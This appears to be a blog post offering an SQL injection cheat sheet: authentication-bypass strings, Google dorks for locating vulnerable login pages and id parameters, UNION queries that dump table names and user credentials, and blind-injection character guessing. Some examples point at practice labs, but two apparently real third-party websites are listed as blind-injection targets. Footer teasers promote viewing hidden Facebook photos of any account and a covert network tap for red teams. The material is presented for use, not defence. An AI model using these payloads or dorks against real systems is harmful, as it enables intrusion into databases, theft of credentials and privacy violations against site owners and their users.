SQL Cheat Sheet

By -

 _______________AUTHENTICATION BYPASS ATTACK__________________


1’ or ‘1’ = ‘1

or 1=1

or 1=1--

or 1=1#

or 1=1/*

admin' --

admin' #

admin'/*

admin' or '1'='1

admin' or '1'='1'--

admin' or '1'='1'#

admin' or '1'='1'/*

admin' or 1=1 or ''='

admin' or 1=1

admin' or 1=1--

admin' or 1=1#

admin' or 1=1/*

admin') or ('1'='1

admin') or ('1'='1'--

admin') or ('1'='1'#

admin') or ('1'='1'/*

admin') or '1'='1

admin') or '1'='1'--

admin') or '1'='1'#

admin') or '1'='1'/*


inurl:admin_login.php

inurl:admin/login.php

inurl:admin-login.php

inurl:adminlogin.php


############Some Google dorks for sql injection###########

inurl:sql.php?id=

inurl:news_view.php?id=

inurl:select_biblio.php?id=

inurl:humor.php?id=

inurl:aboutbook.php?id=

inurl:fiche_spectacle.php?id=

inurl:article.php?id=

inurl:show.php?id=

inurl:staff_id=

inurl:newsitem.php?num=

inurl:readnews.php?id=


inurl: php?id=

inurl: asp?id=

inurl: net?id=


____________________ERROR & UNION SQL INJECTION__________________________

eg: http://vulnsite.com/news.php?id=1          :---  id=1' or id=2-1

to provoke errors

?id=0X01

?id=9999999999999999999999999999999999999999999999

?id=2"

?id=3") and '1'='1'

union select 1,2,3,4,5--+

php?id=-23 union select 1,2,3,4,5--+

.php?id=23 and false union select 1,2,3,4,5--+


testphp.vulnweb.com/artists.php?artist=-1 order by 4--

testphp.vulnweb.com/artists.php?artist=-1 order by 3--

testphp.vulnweb.com/artists.php?artist=-1 union select 1,2,3--

testphp.vulnweb.com/artists.php?artist=-1 union select 1,database(),3--

testphp.vulnweb.com/artists.php?artist=-1 union select 1,version(),3--

testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --

testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7573657273 -- 

union select 1,group_concat(uname,0x3a,pass,email),3 from users--


*******************************************************************************************

##################FOR BLIND SQL#################

https://www.thaibusinessnews.com/readnews.php?id=2114

https://www.hotelone.com.pk/article.php?id=15

Two types of blind sql are there:- Normal Blind, Totally Blind


How to check? 

Conditions:- True or False


No Changes on the default page is "True" else "False"


Check for subselect or subquery (used for comparing)


id=1 and (select 1)=1 to check whether we can execute subquerry or not


and (select 1 from login limit 0,1)=1 ///Guessing method to find the table name

 

and (select substring(concat(1,password),1,1) from login limit 0,1)=1 //Guessing column name


and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80 //checks the first character with the ascii value provided, if its true then we need to increase the value, if its false then we got the character.



=====================================================================================================







MACHINE_IP/sqli-labs/Less-8/?id=1' OR 1 < 2 --+ = True


MACHINE_IP/sqli-labs/Less-8/?id=1' OR 1 > 2 --+ = False


.


In sql language, there's a really useful function called SUBSTR() which extracts a substring from a string (starting at any position). 

It takes 3 input values:

1. Operated text (in our case database name)

2. Character to start with

3. Number of characters to extract



AND (substr((select database()),1,1)) - this will return us the first character of the database name. 



1' substr((select database()),1,1)) = s --+



MACHINE_IP/sqli-labs/Less-8/?id=1' AND (ascii(substr((select database()),1,1))) = 115 --+

 


Now try guessing the second letter using the comparison technique.


MACHINE_IP/sqli-labs/Less-8/?id=1' AND (ascii(substr((select database()),2,1))) < 115 --+












Comments

Post a Comment

Popular posts from this blog

How to see hidden Facebook photos of Any Account.

By -
Image
Hidden Facebook photos of Any Account. 1. Login to facebook.com. 2. Go to the timeline of the user on google chrome. 3. Now you have to find numeric Facebook ID of the user.  4. Right click on the browser page> use view page source. 5. Press ctrl+f or command + f to find entity_id (15digits) 6. https://www.facebook.com/1000044678492414/photos  (ADD THE entity_id here) now copy the URL and paste in the address bar of your browser and hit enter. 7. You will be able to see all the images now.
Read more

Phantom Tap (PhanTap) - An ‘Invisible’ Network Tap.

By -
Image
  Phantom Tap (PhanTap) - An ‘Invisible’ Network Tap Aimed at Red Teams. With limited physical access to a target building, this tap can be installed inline between a network device and the corporate network. PhanTap is silent in the network and does not affect the victim’s traffic, even in networks having NAC (Network Access Control 802.1X - 2004). PhanTap will analyze traffic on the network and mask its traffic as the victim device. It can mount a tunnel back to a remote server, giving the user a foothold in the network for further analysis and pivoting. PhanTap is an OpenWrt package and should be compatible with any device. The physical device used for our testing is currently a small, inexpensive router, the   GL.iNet GL-AR150 . Features: Transparent network bridge. Silent : No ARP, multicast, broadcast. 802.1x passthrough. Automatic configuration: Capture traffic exiting the network (the destination is non RFC1918), source IP and MAC is our victim, destination MAC is our ...
Read more